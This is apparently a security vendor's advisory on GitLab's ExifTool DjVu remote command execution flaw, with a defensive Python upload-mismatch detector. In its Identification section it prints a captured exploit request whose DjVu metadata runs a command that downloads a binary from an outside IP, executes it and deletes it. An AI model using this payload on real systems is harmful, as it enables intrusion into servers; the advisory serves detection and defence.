Application Details
GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.
Vulnerability
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser (ExifTool), which resulted in remote command execution.
Identification
Files uploaded with a jpg, jpeg or tiff extension are passed to ExifTool to strip any metadata tags that GitLab does not allow. The issue is that ExifTool ignores the file extension and chooses its parser from the file content, so a file of another format renamed to .jpg is parsed as that format. In the request below the part declares filename="test.jpg" and Content-Type: image/jpeg, but the body begins with the DjVu signature AT&TFORM and carries a DjVu ANTa annotation chunk. ExifTool's DjVu handler evaluated that metadata as Perl, and the qx#...# operator in the Copyright string executes the embedded shell command (fetch a binary, run it, delete it).
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary
AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO...
......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44.....
FORM....DJVIANTa...P(metadata
(Copyright "\
" . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \
" b ") )
Detection
By turning this vulnerability into a traffic file and a matching rule, we are able to detect attempts to upload files whose content does not match the declared type: a request body that begins with the DjVu signature AT&TFORM while the part declares a jpg, jpeg or tiff filename and an image Content-Type.
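The mismatch check described in the Identification and Detection sections, as an added example written for this page (it is not Idappcom's signature 8021990, nor GitLab or ExifTool code). It splits a multipart/form-data body, sniffs the magic bytes of each file part the way a content-driven parser would, and flags any part whose sniffed type differs from the declared extension or Content-Type. The sample requests, the boundary string, the harmless qx#id# payload and the MIME labels are constructed for the example; the DjVu body reproduces the shape of the capture above with its unprintable bytes replaced by placeholders.

```python
import re

# Added example: content sniffing for multipart uploads. ExifTool selects its
# parser from the leading bytes, not from the extension, which is why a DjVu
# file named "test.jpg" is parsed as DjVu. Flag uploads where the two disagree.

# Magic bytes for the types involved (assumed table, not GitLab's own list).
MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"II*\x00": "image/tiff",          # little-endian TIFF
    b"MM\x00*": "image/tiff",          # big-endian TIFF
    b"AT&TFORM": "image/vnd.djvu",     # DjVu container, as in the capture above
}

# Type the upload filter believed it was handling, keyed by extension.
EXT_TYPES = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "tif": "image/tiff", "tiff": "image/tiff"}

# Constructed sample modelled on the request shown above: a DjVu body uploaded
# as "test.jpg" with Content-Type image/jpeg. The command inside qx#...# is a
# harmless "id"; chunk lengths are placeholders, not a valid DjVu document.
BOUNDARY = b"boundary"
DJVU_AS_JPEG = (
    b"--boundary\r\n"
    b'Content-Disposition: form-data; name="file"; filename="test.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n"
    b"Content-Transfer-Encoding: binary\r\n"
    b"\r\n"
    b"AT&TFORM\x00\x00\x00\x60DJVMDIRM\x00\x00\x00\x00FORM\x00\x00\x00\x40DJVIANTa\x00\x00\x00\x30"
    b'(metadata\n(Copyright "\\\n" . qx#id# . \\\n" b ") )\r\n'
    b"--boundary--\r\n"
)

# Constructed benign sample: a real JPEG header (SOI + APP0/JFIF) under a
# matching filename and Content-Type.
REAL_JPEG = (
    b"--boundary\r\n"
    b'Content-Disposition: form-data; name="file"; filename="photo.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n"
    b"\r\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9\r\n"
    b"--boundary--\r\n"
)


def parse_multipart(body: bytes, boundary: bytes):
    """Minimal multipart/form-data splitter returning a list of (headers, data) per part."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):            # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):          # CRLF that follows the boundary line
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):             # CRLF that precedes the next boundary
            data = data[:-2]
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.partition(b":")
            headers[name.strip().lower().decode("ascii")] = value.strip().decode("latin-1")
        parts.append((headers, data))
    return parts


def sniff_type(data: bytes) -> str:
    """Return the MIME type implied by the leading bytes, as a content-driven parser would."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return "application/octet-stream"


def find_mismatched_uploads(body: bytes, boundary: bytes):
    """Report file parts whose sniffed type differs from the declared extension or Content-Type."""
    findings = []
    for headers, data in parse_multipart(body, boundary):
        match = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if not match:
            continue                            # not a file part
        filename = match.group(1)
        ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
        declared = headers.get("content-type", "").split(";")[0].strip().lower()
        actual = sniff_type(data)
        expected = EXT_TYPES.get(ext)
        if actual == declared and (expected is None or actual == expected):
            continue                            # extension, Content-Type and content all agree
        findings.append({
            "filename": filename,
            "declared": declared,
            "actual": actual,
            # Heuristic of this example only: a DjVu annotation chunk carrying
            # Perl's qx quoting operator, the shape of the payload in the capture.
            "perl_in_djvu_metadata": actual == "image/vnd.djvu" and b"ANTa" in data and b"qx#" in data,
        })
    return findings


if __name__ == "__main__":
    for finding in find_mismatched_uploads(DJVU_AS_JPEG, BOUNDARY):
        print("mismatch:", finding)
    print("benign upload findings:", find_mismatched_uploads(REAL_JPEG, BOUNDARY))
```

The primary signal is the disagreement between the declared type and the magic bytes; the perl_in_djvu_metadata flag is a secondary indicator added here for triage, and a benign DjVu renamed to .jpg is still worth blocking because ExifTool will parse it as DjVu regardless.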
Coverage
Idappcom has created signature 8021990 along with a traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional